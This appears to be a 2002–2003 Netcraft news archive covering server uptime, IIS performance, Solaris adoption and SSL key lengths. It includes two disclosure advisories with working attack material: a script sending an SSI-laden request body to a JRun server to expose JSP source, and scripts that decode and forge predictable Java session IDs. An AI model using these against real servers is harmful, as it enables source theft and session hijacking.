Windows 2000 site goes over two years without a reboot
22nd January, 2003
This month is the first time that a Windows 2000 site has appeared among the top 50 sites with the longest time since their last reboot. www.byteandswitch.com has been running continuously since November 2000. When we first started graphing web server uptime in the summer of 2000, many people were skeptical that a Windows machine would ever make the top 50. Perceptions change, and although two years is exceptional, several Windows 2000 sites have run for more than a year without a reboot. In the hosting industry, Microsoft partners Interliant and Devine each have sites that have not been rebooted in over a year, while Microsoft has also run several of its own sites for over a year between reboots.
Posted by Mike Prettejohn in Around the Net
Performance of www.intel.com attracting interest
21st January, 2003
www.intel.com is one of a very small number of well known sites running both Windows 2000 and Windows 2003 in a load balanced pool, and has become a tempting target for people to use as a straw in the wind towards the relative performance of the two operating systems. One person mailed us saying he thought that the Intel site's response time had slowed since Intel started using Windows 2003, and asked for confirmation and explanation.
The performance of www.intel.com shows a saw tooth formation, with some responses consistently longer than others. Matching up the response times with the corresponding server signatures actually does confirm that the responses served by Microsoft-IIS/6.0 are consistently longer than those served by Microsoft-IIS/5.0.

Analysing the response time graph more carefully shows that the connection time and time to serve the first byte are consistent across the two sets of servers, but the time to serve the complete request is significantly higher on the Microsoft-IIS/6.0 servers.
London at mid-day on 16 Jan 2003, by web server:

| Server | Microsoft-IIS/5.0 | Microsoft-IIS/6.0 |
|---|---|---|
| Quickest | 1.22 | 2.00 |
| Slowest | 1.28 | 2.21 |
| Average | 1.25 | 2.09 |
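As a rough illustration of how such a breakdown can be measured, the sketch below times the connection, the first byte of the response, and the complete download for a single plain-HTTP request. It is our own illustrative script, not Netcraft's monitoring code; the hostname and sample count are arbitrary.

```python
import socket
import time

def time_request(host, path="/", port=80):
    """Measure connect time, time to first byte, and total time for a
    single plain-HTTP GET request. Illustrative only - not the
    methodology used by Netcraft's performance monitors."""
    start = time.time()
    sock = socket.create_connection((host, port), timeout=30)
    connect_time = time.time() - start

    request = "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path, host)
    sock.sendall(request.encode("ascii"))

    first_byte_time = None
    total_bytes = 0
    while True:
        data = sock.recv(4096)
        if not data:
            break
        if first_byte_time is None:
            first_byte_time = time.time() - start
        total_bytes += len(data)
    total_time = time.time() - start
    sock.close()
    return connect_time, first_byte_time, total_time, total_bytes

if __name__ == "__main__":
    # Take a handful of samples; against a load-balanced pool, different
    # samples may be answered by different back-end servers.
    for _ in range(5):
        connect, first_byte, total, size = time_request("www.intel.com")
        print("connect %.2fs  first byte %.2fs  total %.2fs  (%d bytes)"
              % (connect, first_byte, total, size))
```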
It is important to appreciate that the difference need not be directly caused by the system software. Other plausible reasons include:
- The Microsoft-IIS/5.0 machines may have a higher hardware specification than those running Microsoft-IIS/6.0
- The configuration of the systems is likely to be different
- From looking at the tcp/ip characteristics, we think it is likely that the www.intel.com front page is served dynamically, and the migration of the application that generates the dynamic content may have introduced a performance penalty
- The configuration of the local network at Intel may have disadvantaged the Microsoft-IIS/6.0 machines in some way
Posted by Mike Prettejohn in Dogfood
Security Advisory 2001-11.1 - JRun SSI Request Body Parsing
1st January, 2003
Vulnerable Products: JRun Java application server from Allaire. All current versions (with latest security patches as of November 2001) are believed to be affected, including 2.3.3, 3.0, and 3.1.
Impact: Revealing of source code to Java Server Pages, and other protected files inside the web root.
Affects: Web sites using vulnerable products as stated above.
Revision history: Vendor notified: 22nd October, 2001.
Overview
JRun supports a number of different technologies for dynamically generated content, most importantly Java Server Pages. One lesser-used feature is support for Server Side Includes (SSI). SSI is a much simpler language than JSP, primarily used for including the text of other files on the server (for instance, adding standard headers or footers to otherwise static pages); it also supports invoking servlets. By default, the file extension .shtml is assigned to the SSI handler.
Unfortunately, a flaw in the server side component that processes requests for SSI pages means that user supplied data can be included in the SSI processing. A remote user can submit requests containing data which will be processed by the SSI filter; as a result the user can cause the server to execute arbitrary SSI code.
Details
When a request for an SSI page is submitted to the server, and the page does not exist, the SSI handler "falls back" on the body of the HTTP request itself. Usually an HTTP request does not contain a body, but a malicious user can easily construct a request with a body containing SSI commands. These can be used to include the source to other files on the server. For example, a request such as:
```
GET /nosuch.shtml HTTP/1.0
Content-Length: 38

<!--#include virtual="/index.jsp"-->
```
would return the source of the index.jsp page (subject to SSI processing, so servlet tags may be replaced, but most JSP source would be passed through unmodified).
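Any client that can attach a body to a GET request will reproduce this behaviour. The sketch below does so over a raw socket; the hostname is a placeholder, and the script is our own illustration rather than a tool supplied with this advisory.

```python
import socket

HOST = "vulnerable.example.com"   # placeholder, not a real target
BODY = b'<!--#include virtual="/index.jsp"-->\n'

# A GET request for a non-existent .shtml page, carrying SSI directives
# in the request body; the Content-Length must match the body exactly.
request = (
    b"GET /nosuch.shtml HTTP/1.0\r\n"
    b"Host: " + HOST.encode("ascii") + b"\r\n"
    b"Content-Length: " + str(len(BODY)).encode("ascii") + b"\r\n"
    b"\r\n" + BODY
)

sock = socket.create_connection((HOST, 80), timeout=30)
sock.sendall(request)

response = b""
while True:
    chunk = sock.recv(4096)
    if not chunk:
        break
    response += chunk
sock.close()

# On an unpatched JRun server the response body would contain the source
# of /index.jsp rather than an error page.
print(response.decode("latin-1", "replace"))
```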
It should be noted that the include directive does not go through the usual URL processing; for example, includes of .jsp files are not done by the JSP handler, hence the source code of .jsp files can be obtained. It also bypasses any access controls enforced by the web server, so files in protected directories such as the /WEB-INF/ directory can be accessed. However, it was not possible to access files outside of the web root in the cases that Netcraft tested.

Netcraft also verified that it was possible to execute Java servlets on the server using this vulnerability. As it is common to expose these via the /servlet/ URL mapping, this does not give the attacker any new advantage in the normal setup, but it could be considered a problem by sites that have disabled the /servlet/ mapping.
Recommendations
As a workaround, sites using JRun can disable SSI support on the web server. SSI is not required for any other feature of the server, including Java Server Pages, so few sites actually need this functionality. Disabling it involves both removing the .shtml extension mapping to the SSI handler, and disabling the /servlet/ method of invoking the servlet which performs the SSI processing. The latter can be done either by disabling the /servlet/ mapping if it is not used, or by blocking access to the particular servlet affected (allaire.jrun.ssi.SSIFilter for JRun 3.x, com.livesoftware.jrun.plugins.ssi.SSIFilter on JRun 2.3.x).

See the security bulletin from Allaire for detailed information on making this configuration change.
Vendor Patches and Comments
Allaire have responded promptly to Netcraft's initial report of this problem. They have confirmed that this is a security problem in the JRun versions listed. A patch is expected to be included in the next rollup patch for JRun. In the meantime they have released a security bulletin to notify customers of this problem, and advise a workaround by disabling SSI.
Disclaimer
This information is provided on an AS IS basis in the hope that it is useful in securing vulnerable computer systems; however Netcraft cannot guarantee its accuracy or accept responsibility for any damage resulting from the release of this advisory.
Netcraft
This is one of many vulnerabilities tested by Netcraft's security testing services. Please see http://news.netcraft.com/archives/security.html for more information.
Posted by Martyn Tovey in Security
Security Advisory 2001-01.1 - Predictable Session IDs
1st January, 2003
Vulnerable Products: Java Application Servers based on Sun's reference implementation of the Java Servlet Developers Kit (JSDK 2.0), without enhancements to the session management code, may be vulnerable. The affected products are listed under Vendor Patches and Comments below.
Not Vulnerable: Products based on JSDK V2.1 (onward), which uses a different algorithm, or products that conform to the 2.x Java Servlet API but use custom session management code.
Impact: Hijacking of user sessions.
Affects: Websites using vulnerable products as stated above.
Revision history: Released to Vendors: 6th November 2000.
Overview
Many websites support the idea of user sessions - each user connecting to the site is issued with a unique session ID, which is then used to identify all subsequent requests made by that user, either encoded in the URLs, or as a cookie. The server can then store data for each user session, for instance the state of a web shopping cart. Session IDs are also often used to control access to sites requiring a login; instead of sending the username/password with every request, the site issues a session ID after the user logs on, which identifies the user for the rest of the session.
With some server session management systems, it is possible for a user who can connect to the server and obtain a session ID to guess other users' session IDs. If successful, the attacker can then view any page, take any action, and post to any form that the real user of that session could.
This attack requires no IP spoofing or session snooping. It works against sites using SSL. Netcraft has successfully proven this attack against machines using cookie-based and URL rewriting-based session management.
Details
From a security point of view, the important properties of a session ID should be that it is unique, and it is not possible for one user to guess another user's session ID.
One way to ensure uniqueness is to include a session counter or timestamp in the session ID. In particular, for the sites we found to be vulnerable, the session ID included:
- A session counter
- The IP address of the server
- A value made by combining the date, session counter, and current system time in milliseconds (we'll call this the timestamp)
This certainly appears sufficient to ensure uniqueness. However, if one user can get this information out of his session ID, he can clearly use it to guess other users' session IDs.
Encoding of Session IDs
For servers Netcraft has identified as vulnerable, the session ID is encoded using a simple rule. 5 bits at a time are taken from the binary session ID; these 5 bits form a number between 0 and 31. Numbers 0-25 are encoded with the corresponding letters A-Z; numbers 26-31 are encoded by the digits 0-5 respectively. It's a kind of "base32" encoding - which can be decoded trivially.
Here's a typical session ID being decoded:
```
$ echo -n "FGAZOWQAAAK2RQFIAAAU45Q" | ./base32.pl -d
29 81 97 5a 00 00 15 c8 c0 a8 00 01 4f 7e
```
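The base32.pl helper is not reproduced in this advisory, but the decoding it performs is easy to reimplement. The following sketch is our own equivalent and reproduces the output shown above:

```python
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"   # A-Z -> 0-25, 0-5 -> 26-31

def decode_session_id(session_id):
    """Decode the base32-like session ID into raw bytes: 5 bits per
    character, most significant bit first, trailing padding discarded."""
    bits = "".join(format(ALPHABET.index(ch), "05b") for ch in session_id)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits) - 7, 8))

print(decode_session_id("FGAZOWQAAAK2RQFIAAAU45Q").hex(" "))
# prints: 29 81 97 5a 00 00 15 c8 c0 a8 00 01 4f 7e
```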
This breaks up as: (all integers are in network byte order)
- Bytes 0-3: Timestamp
- Bytes 4-7: Session count
- Bytes 8-11: IP address of the server issuing the session ID
- Bytes 12-13: Random number (or zero, see below)
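Given the decoded bytes, extracting these fields is just a matter of fixed offsets. A sketch of the parsing (again our own illustration, not the decode-sessionid.pl tool that appears in the transcript below):

```python
import socket
import struct

def parse_session_fields(raw):
    """Split the 14 decoded bytes into the fields listed above.
    All integers are big-endian (network byte order). Note that the
    'timestamp' is the combined date/counter/millisecond value described
    earlier, not a plain Unix time."""
    timestamp, count = struct.unpack(">II", raw[0:8])
    server_ip = socket.inet_ntoa(raw[8:12])
    extra = raw[12:14]                     # the "random" bytes
    return timestamp, count, server_ip, extra

raw = bytes.fromhex("2981975a000015c8c0a800014f7e")
timestamp, count, server_ip, extra = parse_session_fields(raw)
print("timestamp=0x%08x  session count=%d  server IP=%s  extra=%s"
      % (timestamp, count, server_ip, extra.hex()))
# prints: timestamp=0x2981975a  session count=5576  server IP=192.168.0.1  extra=4f7e
```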
The Attack
We now know everything we need to try to hijack another user's session. The timestamp is always increasing, the session count simply increments, and the internal server IP address is constant. If we make two requests to the server, and the session count of the second request is more than 1 higher than the session count of the first, then we know that another session has started in between. We know also that the timestamp of that session will be between our two timestamps.
The two "random bytes" might have been a stumbling block, but:
- The random bytes are not used by all servers, in which case they are zero.
- For many servers tried, the random bytes are only generated when the server is started; they are the same for all user sessions.
For example, a couple of consecutive session IDs from a website might be something like this:
```
$ perl -e 'print "HEAD / HTTP/1.0\n\n"' | nc www.example.com 80 | grep sessionid
Set-cookie: sessionid=FGAZOWQAAAK2RQFIAAAU45Q;path=/

$ ./decode-sessionid.pl -s FGAZOWQAAAK2RQFIAAAU45Q
SessionID gives: Thu Oct 12 12:34:06 2000, session count = 5576, IP Address = 192.168.0.1
Extra = 4f (79) 7e (126)

$ perl -e 'print "HEAD / HTTP/1.0\n\n"' | nc www.example.com 80 | grep sessionid
Set-cookie: sessionid=FGFLIHYAAALJVQFIAAAU45Q;path=/

$ ./decode-sessionid.pl -s FGFLIHYAAALJVQFIAAAU45Q
SessionID gives: Thu Oct 12 12:38:44 2000, session count = 5786, IP Address = 192.168.0.1
Extra = 4f (79) 7e (126)
```
Note that all session IDs in this report were obtained from real servers, but have been modified to avoid naming those servers. The name of the session ID is usually, but not always, "sessionid", "sesessionid", "JSESSIONID" or "jwssessionid".
The random extra bytes don't seem to be very random, but you do need to watch out for load-balanced servers, as each will have different counts and random elements.
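To make the guessing step concrete, the re-encoding an attacker would need is simply the inverse of the decoding shown earlier. The sketch below is our own illustration; it round-trips the example session ID by packing a timestamp, session count, server IP address and the extra bytes back into the encoded form:

```python
import socket
import struct

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"

def encode_session_id(raw):
    """Inverse of the decoding shown earlier: pack 14 raw bytes back into
    the 23-character session ID (trailing bits padded with zeros)."""
    bits = "".join(format(b, "08b") for b in raw)
    bits += "0" * (-len(bits) % 5)          # pad to a multiple of 5 bits
    return "".join(ALPHABET[int(bits[i:i + 5], 2)]
                   for i in range(0, len(bits), 5))

# An attacker bracketing a victim's session would pack each guessed
# (timestamp, session count) pair together with the known server IP and
# "random" bytes, then re-encode the result as a candidate ID.
candidate = encode_session_id(
    struct.pack(">II", 0x2981975A, 5576) +
    socket.inet_aton("192.168.0.1") +
    bytes.fromhex("4f7e"))
assert candidate == "FGAZOWQAAAK2RQFIAAAU45Q"   # round-trips the example above
```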
Consequences
Once an attacker has guessed another user's session ID, they have full access to that user's session (assuming the session ID is the sole identifier used for session management and security, which it is on many sites). If the service provides a means of logging out, the session ID is only useful until the real user logs out. Until then the attacker can typically view any page, take any action, and post to any form that the real user can on the site, and the real user will be unaware of this until some action taken by the attacker has a visible result. Basically, it's very bad news.
Of course, the fact that the session IDs leak your internal IP addresses and, perhaps more importantly from the business point of view, the server's session count (easy way to track the popularity of competitors' sites) is in itself a cause for concern.
Testing Vulnerability
There are a large number of servers on the Internet using session ID cookies or URL re-writing encoded in this fashion. The easiest way to identify such sites is to find a page on the site which generates a session ID (often this is either the home page, or the page which processes logins), then make a few requests to this page, and compare the session IDs, looking for the incrementing session count.
Netcraft is reluctant to give a more exact test here, because it could lead to a false sense of security for administrators whose sites don't display the behaviour described above. Netcraft has seen some variations on the basic theme (e.g. some servers have longer session IDs than those described here, but the extra data appears constant).
Recommendations
- There should be some real random input to the session IDs if they are to be used as the sole means of session tracking and management.
- Any meaningful data being used in session IDs should be one-way encrypted. You shouldn't be trusting users to play fair with this information.
Recent versions of Sun's Java servlet code (from version 2.1) use a new session ID system, which includes a large random component. However, developers building application servers should enhance the code to make the session count inaccessible.
The Apache Tomcat project, starting with Tomcat version 3.2, uses a secure random number generator, and maintains uniqueness of session IDs without leaking the session count.
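As a generic illustration of these recommendations (not the fix that any particular vendor shipped), a session ID can be drawn entirely from a cryptographically secure random source, and any meaningful data that must travel with it can be authenticated rather than exposed:

```python
import hashlib
import hmac
import os

SERVER_SECRET = os.urandom(32)        # generated once, kept server-side

def new_session_id():
    """An unguessable session ID: 16 bytes from the OS CSPRNG, hex encoded.
    It carries no counter, timestamp or server address."""
    return os.urandom(16).hex()

def protect(session_id, data):
    """If meaningful data must be tied to the ID, bind it with an HMAC
    under a server-side secret instead of embedding it in the clear."""
    tag = hmac.new(SERVER_SECRET, (session_id + "|" + data).encode(),
                   hashlib.sha256).hexdigest()
    return data + "|" + tag

print(new_session_id())
```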
Vendor Patches and Comments
ATG
Bug numbers:
Dynamo 5.1, Dynamo 5.0 Patch 2 - Bug #29826
Dynamo 4.5.1 Patch 5 - Bug #25925
Dynamo 4.1.0 Patch 9 - Bug #31956
Dynamo 4.0.1 Patch 4 - Bug #31957
Dynamo 3.5.1 Patch 8 - Bug #32277
Versions affected:
Dynamo 3.5.1, Dynamo 3.5.1 Patch 1 through 7
Dynamo 4.0.1, Dynamo 4.0.1 Patch 1 through 3
Dynamo 4.1.0, Dynamo 4.1.0 Patch 1 through 8
Dynamo 4.5.0, Dynamo 4.5.0 Patch 1 through 5
Dynamo 4.5.1, Dynamo 4.5.1 Patch 1 through 4
Dynamo 5.0, Dynamo 5.0 Patch 1
Versions not affected:
Dynamo 5.1, Dynamo 5.0 Patch 2 and all future releases
Dynamo 4.5.1 Patch 5 and all future releases
Dynamo 4.1.0 Patch 9 and all future releases
Dynamo 4.0.1 Patch 4 and all future releases
Dynamo 3.5.1 Patch 8 and all future releases
Patch location:
Available to registered users in the support area on atg.com, under "Dynamo Patches".
Dynamo 5.1, Dynamo 5.0 Patch 2, Dynamo 4.5.1 Patch 5 are available as of 20th December, 2000.
Dynamo 3.5.1 through 4.1.0 patches should be available in mid-January 2001.
IBM
"With V2.x, we have always had hooks in the HttpSession support to allow applications to associate authentication information with a session and prevent access to that session if the right credentials are not provided. For customer applications who could not do this, we earlier this year provided a V2.x patch which further 'randomizes' the session ID, using a triple DES encryption ID generation algorithm.
With V3.x, we feel we have always prevented this issue - There is built in coupling between the HttpSession and WebSphere security, where authentication is automatically associated with the session and thus is used to prevent all unauthenticated access. One can review the WebSphere documentation to review all the various means available for securely maintaining this authorization."
E-fix PQ47663 is now available for version 3.02 and 3.5.x of WebSphere. For version 2, ask WebSphere support for the "version 2 HttpSession ID randomization change".
Sun Microsystems
For Java Web Server 1.1.1 or 1.1.2, first upgrade the Java Web Server and then install the appropriate patch:
Version 2.0 Patch 4
Version 1.1.3 Patch 4
Patches available from http://www.sun.com/software/jwebserver/upgrade/index.html.
Disclaimer
This information is provided on an AS IS basis in the hope that it is useful in securing vulnerable computer systems; however Netcraft cannot guarantee its accuracy or accept responsibility for any damage resulting from the release of this advisory.
Netcraft
For more information on Netcraft security services, please see http://news.netcraft.com/archives/security.html
Posted by Martyn Tovey in Security
Solaris sites curiously slow to upgrade
30th September, 2002
A couple of months ago we highlighted the low numbers of sites migrating to Apache/2.0, and contrasted it with the speed at which site administrators adopted Apache/1.3.26 which contained a fix for a potential buffer overflow problem.
If anything, more surprising is the slow adoption of new versions of Sun's Solaris operating system. Solaris 9, released in May this year, is running on fewer than 1,000 web site IP addresses found by the September survey, and there are roughly twice as many sites running Solaris 2 & Solaris 7 as are running Solaris 8, released in March 2000.
Historically, slowness to gather upgrade revenue has usually been a portent of trouble to come for web technology vendors, and the figures coincide with Sun's difficulties generating revenue and profits over the last eighteen months. By contrast, Windows .Net Server, which is not yet scheduled for release, has almost as many IP addresses as Solaris 9, including some impressive, high volume sites, such as Nasdaq.
Sun would reasonably point out that their boxes typically cost a lot more, and the upgrade cycle for more expensive kit could be expected to be slower.
Posted in Other
Crypto Regulations Cast Long Shadow
11th March, 2002
Recently, the strength of SSL key lengths has been the subject of heated debate in security circles, after Nicko van Someren disclosed that he is able to break 512-bit keys in around six weeks, using conventional office computers.
The analysis focuses on the key length used for the server's public key (the key which is used to prove the authenticity of the server to web browsers). The longer the key, the harder it is for an attacker to break the key - if this key is broken, it can compromise both past and future secure browsing sessions, and allow the attacker to impersonate the server. Most experts currently recommend a key length of at least 1024 bits as secure and some of the strongest debate has concerned the perceived safety of these 1024 bit keys.
However, a more timely aspect to the work is to highlight the number of SSL servers currently in use on the internet, and their geographical location.
Although US export restrictions on strong cryptography have been relaxed in recent years, data collected as part of our SSL Server Survey shows that US export legislation, and locally enacted legislation restricting the use of cryptography in countries with repressive or eccentric administrations, still casts a shadow over the security of ecommerce, even years after the acts have been repealed.
| Country | Percentage of sites with short keys |
|---|---|
| Canada | 13.5% |
| USA | 15.1% |
| UK | 26.5% |
| Spain | 31.9% |
| France | 41.1% |
Internet-wide, around 18% of SSL servers use potentially vulnerable key lengths. However, these tend to be concentrated in geographical areas outside the United States and its close trading partners. In the US, where over 60% of SSL sites are situated, and in Canada, only around 15% of sites use short keys. In most European countries over 25% are still using short keys, and in France, which had laws restricting the use of cryptography until relatively recently, over 40% of sites use short keys.
US export regulations (described in detail by the Crypto Law Survey) have had a discernible impact in slowing the use of strong cryptography outside the United States. One reason export-grade cryptography remains quite common is that the relative weakness of the server's choice of cryptography is not obvious to the end user, so there is little pressure to make the change. Browser developers are in a position to help change this, perhaps by displaying a graded indication of key length rather than the present lock symbol, which is displayed on all SSL sessions regardless of strength.
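Administrators wanting to check where their own sites stand can read the public key size directly from the server's certificate. The sketch below uses Python's ssl module together with the third-party cryptography package; it is our own example and is unrelated to the survey's methodology. The hostname is a placeholder.

```python
import socket
import ssl

from cryptography import x509

def server_key_bits(host, port=443):
    """Return the size in bits of the public key in the server's certificate."""
    context = ssl.create_default_context()
    context.check_hostname = False       # we only want to read the certificate,
    context.verify_mode = ssl.CERT_NONE  # not to validate the chain
    with socket.create_connection((host, port), timeout=30) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            der_cert = tls.getpeercert(binary_form=True)
    return x509.load_der_x509_certificate(der_cert).public_key().key_size

bits = server_key_bits("www.example.com")   # placeholder hostname
print("%d-bit public key%s" % (bits, " (short)" if bits < 1024 else ""))
```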